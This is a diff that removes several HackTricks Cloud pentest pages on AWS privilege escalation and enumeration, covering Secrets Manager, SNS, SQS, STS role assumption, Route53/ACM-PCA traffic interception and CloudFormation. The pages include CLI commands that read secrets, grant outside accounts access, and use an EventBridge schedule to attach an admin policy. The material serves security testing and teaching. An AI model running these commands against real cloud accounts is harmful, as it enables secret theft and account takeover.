- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secrets Manager - -For more info about secrets manager check: - -{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} -[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) -{% endcontent-ref %} - -### `secretsmanager:GetSecretValue` - -An attacker with this permission can get the **saved value inside a secret** in AWS **Secretsmanager**. - -```bash -aws secretsmanager get-secret-value --secret-id # Get value -``` - -**Potential Impact:** Access high sensitive data inside AWS secrets manager service. - -### `secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`) - -With the previous permissions it's possible to **give access to other principals/accounts (even external)** to access the **secret**. Note that in order to **read secrets encrypted** with a KMS key, the user also needs to have **access over the KMS key** (more info in the [KMS Enum page](../aws-services/aws-kms-enum.md)). - -```bash -aws secretsmanager list-secrets -aws secretsmanager get-resource-policy --secret-id -aws secretsmanager put-resource-policy --secret-id --resource-policy file:///tmp/policy.json -``` - -policy.json: - -```json -{ - "Version" : "2012-10-17", - "Statement" : [ { - "Effect" : "Allow", - "Principal" : { - "AWS" : "arn:aws:iam:::root" - }, - "Action" : "secretsmanager:GetSecretValue", - "Resource" : "*" - } ] -} -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md deleted file mode 100644 index bdbe2bea2..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md +++ /dev/null @@ -1,71 +0,0 @@ -# AWS - SNS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SNS - -For more information check: - -{% content-ref url="../aws-services/aws-sns-enum.md" %} -[aws-sns-enum.md](../aws-services/aws-sns-enum.md) -{% endcontent-ref %} - -### `sns:Publish` - -An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources. - -```bash -aws sns publish --topic-arn --message -``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. - -### `sns:Subscribe` - -An attacker could subscribe or to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic. - -{% code overflow="wrap" %} -```bash -aws sns subscribe --topic-arn --protocol --endpoint -``` -{% endcode %} - -**Potential Impact**: Unauthorized access to messages (sensitve info), service disruption for applications relying on the affected topic. - -### `sns:AddPermission` - -An attacker could grant unauthorized users or services access to an SNS topic, potentially getting further permissions. - -```css -aws sns add-permission --topic-arn --label --aws-account-id --action-name -``` - -**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md deleted file mode 100644 index 258084f11..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md +++ /dev/null @@ -1,74 +0,0 @@ -# AWS - SQS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SQS - -For more information check: - -{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} -[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) -{% endcontent-ref %} - -### `sqs:AddPermission` - -An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities. - -{% code overflow="wrap" %} -```bash -cssCopy codeaws sqs add-permission --queue-url --actions --aws-account-ids --label -``` -{% endcode %} - -**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services. - -### `sqs:SendMessage` , `sqs:SendMessageBatch` - -An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources. - -```bash -aws sqs send-message --queue-url --message-body -aws sqs send-message-batch --queue-url --entries -``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. - -### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility` - -An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages. - -```bash -aws sqs receive-message --queue-url -aws sqs delete-message --queue-url --receipt-handle -aws sqs change-message-visibility --queue-url --receipt-handle --visibility-timeout -``` - -**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md deleted file mode 100644 index 1162ac6fe..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md +++ /dev/null @@ -1,153 +0,0 @@ -# AWS - STS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## STS - -### `sts:AssumeRole` - -Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**). - -For example, the following role trust policy indicates that anyone can assume it, therefore **any user will be able to privesc** to the permissions associated with that role. - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "sts:AssumeRole" - } - ] -} -``` - -You can impersonate a role running: - -```bash -aws sts assume-role --role-arn $ROLE_ARN --role-session-name sessionname -``` - -**Potential Impact:** Privesc to the role. - -{% hint style="danger" %} -Note that in this case the permission `sts:AssumeRole` needs to be **indicated in the role to abuse** and not in a policy belonging to the attacker.\ -With one exception, in order to **assume a role from a different account** the attacker account **also needs** to have the **`sts:AssumeRole`** over the role. -{% endhint %} - -### **`sts:GetFederationToken`** - -With this permission it's possible to generate credentials to impersonate any user: - -```bash -aws sts get-federation-token --name -``` - -This is how this permission can be given securely without giving access to impersonate other users: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "VisualEditor0", - "Effect": "Allow", - "Action": "sts:GetFederationToken", - "Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}" - } - ] -} -``` - -### `sts:AssumeRoleWithSAML` - -A trust policy with this role grants **users authenticated via SAML access to impersonate the role.** - -An example of a trust policy with this permission is: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "OneLogin", - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin" - }, - "Action": "sts:AssumeRoleWithSAML", - "Condition": { - "StringEquals": { - "SAML:aud": "https://signin.aws.amazon.com/saml" - } - } - } - ] -} -``` - -To generate credentials to impersonate the role in general you could use something like: - -```bash -aws sts assume-role-with-saml --role-arn --principal-arn -``` - -But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role): - -{% code overflow="wrap" %} -```bash -onelogin-aws-assume-role --onelogin-subdomain mettle --onelogin-app-id 283740 --aws-region eu-west-1 -z 3600 -``` -{% endcode %} - -**Potential Impact:** Privesc to the role. - -### `sts:AssumeRoleWithWebIdentity` - -This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. [Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html) - -For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like: - -{% code overflow="wrap" %} -```bash -aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/ --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token -# The role name can be found in the metadata of the configuration of the pod -``` -{% endcode %} - -### Federation Abuse - -{% content-ref url="../aws-basic-information/aws-federation-abuse.md" %} -[aws-federation-abuse.md](../aws-basic-information/aws-federation-abuse.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md deleted file mode 100644 index 9173fadf5..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md +++ /dev/null @@ -1,75 +0,0 @@ -# AWS - EventBridge Scheduler Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EventBridge Scheduler - -More info EventBridge Scheduler in: - -{% content-ref url="../aws-services/eventbridgescheduler-enum.md" %} -[eventbridgescheduler-enum.md](../aws-services/eventbridgescheduler-enum.md) -{% endcontent-ref %} - -### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`) - -An attacker with those permissions will be able to **`create`|`update` an scheduler and abuse the permissions of the scheduler role** attached to it to perform any action - -For example, they could configure the schedule to **invoke a Lambda function** which is a templated action: - -```bash -aws scheduler create-schedule \ - --name MyLambdaSchedule \ - --schedule-expression "rate(5 minutes)" \ - --flexible-time-window "Mode=OFF" \ - --target '{ - "Arn": "arn:aws:lambda:::function:", - "RoleArn": "arn:aws:iam:::role/" - }' -``` - -In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. One example can be using universal targets adding "**AdminAccessPolicy**", using a role that has "**putRolePolicy**" policy: - -```bash -aws scheduler create-schedule \ - --name GrantAdminToTargetRoleSchedule \ - --schedule-expression "rate(5 minutes)" \ - --flexible-time-window "Mode=OFF" \ - --target '{ - "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy", - "RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy", - "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}" - }' -``` - -## References - -* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html) -* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md b/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md deleted file mode 100644 index 4a13f8e5c..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md +++ /dev/null @@ -1,59 +0,0 @@ -# AWS - Route53 Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -For more information about Route53 check: - -{% content-ref url="../aws-services/aws-route53-enum.md" %} -[aws-route53-enum.md](../aws-services/aws-route53-enum.md) -{% endcontent-ref %} - -### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate` - -{% hint style="info" %} -To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic. -{% endhint %} - -Other permissions **recommend but not required for the enumeration** part: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs` - -Assuming there is an AWS VPC with multiple cloud-native applications talking to each other and to AWS API. Since the communication between the microservices is often TLS encrypted there must be a private CA to issue the valid certificates for those services. **If ACM-PCA is used** for that and the adversary manages to get **access to control both route53 and acm-pca private CA** with the minimum set of permissions described above, it can **hijack the application calls to AWS API** taking over their IAM permissions. - -This is possible because: - -* AWS SDKs do not have [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning) -* Route53 allows creating Private Hosted Zone and DNS records for AWS APIs domain names -* Private CA in ACM-PCA cannot be restricted to signing only certificates for specific Common Names - -**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. - -#### Exploitation - -Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/README.md b/pentesting-cloud/aws-security/aws-services/README.md deleted file mode 100644 index 67243cb53..000000000 --- a/pentesting-cloud/aws-security/aws-services/README.md +++ /dev/null @@ -1,57 +0,0 @@ -# AWS - Services - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Types of services - -### Container services - -Services that fall under container services have the following characteristics: - -* The service itself runs on **separate infrastructure instances**, such as EC2. -* **AWS** is responsible for **managing the operating system and the platform**. -* A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**. -* As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**. -* Also, platform-level identity and access management where it exists. -* **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk. - -### Abstract Services - -* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**. -* The services are accessed via endpoints using AWS application programming interfaces, APIs. -* The **underlying infrastructure, operating system, and platform is managed by AWS**. -* The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared. -* **Data is isolated via security mechanisms**. -* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS. - -## Services Enumeration - -**The pages of this section are ordered by AWS service. In there you will be able to find information about the service (how it works and capabilities) and that will allow you to escalate privileges.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md deleted file mode 100644 index a4e9343ab..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md +++ /dev/null @@ -1,101 +0,0 @@ -# AWS - CloudFormation & Codestar Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## CloudFormation - -AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure. - -### Enumeration - -```bash -# Stacks -aws cloudformation list-stacks -aws cloudformation describe-stacks # You could find sensitive information here -aws cloudformation list-stack-resources --stack-name -aws cloudformation get-template --stack-name cloudformationStack -aws cloudformation describe-stack-events --stack-name cloudformationStack - -## Show params and outputs -aws cloudformation describe-stacks | jq ".Stacks[] | .StackId, .StackName, .Parameters, .Outputs" - -# Export -aws cloudformation list-exports -aws cloudformation list-imports --export-name - -# Stack Sets -aws cloudformation list-stack-sets -aws cloudformation describe-stack-set --stack-set-name -aws cloudformation list-stack-instances --stack-set-name -aws cloudformation list-stack-set-operations --stack-set-name -aws cloudformation list-stack-set-operation-results --stack-set-name --operation-id -``` - -### Privesc - -In the following page you can check how to **abuse cloudformation permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-cloudformation-privesc/" %} -[aws-cloudformation-privesc](../aws-privilege-escalation/aws-cloudformation-privesc/) -{% endcontent-ref %} - -### Post-Exploitation - -Check for **secrets** or sensitive information in the **template, parameters & output** of each CloudFormation - -## Codestar - -AWS CodeStar is a service for creating, managing, and working with software development projects on AWS. You can quickly develop, build, and deploy applications on AWS with an AWS CodeStar project. An AWS CodeStar project creates and **integrates AWS services** for your project development toolchain. Depending on your choice of AWS CodeStar project template, that toolchain might include source control, build, deployment, virtual servers or serverless resources, and more. AWS CodeStar also **manages the permissions required for project users** (called team members). - -### Enumeration - -```bash -# Get projects information -aws codestar list-projects -aws codestar describe-project --id -aws codestar list-resources --project-id -aws codestar list-team-members --project-id - - aws codestar list-user-profiles - aws codestar describe-user-profile --user-arn -``` - -### Privesc - -In the following page you can check how to **abuse codestar permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-codestar-privesc/" %} -[aws-codestar-privesc](../aws-privilege-escalation/aws-codestar-privesc/) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md deleted file mode 100644 index d80ef3c21..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md +++ /dev/null @@ -1,70 +0,0 @@ -# AWS - CloudFront Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
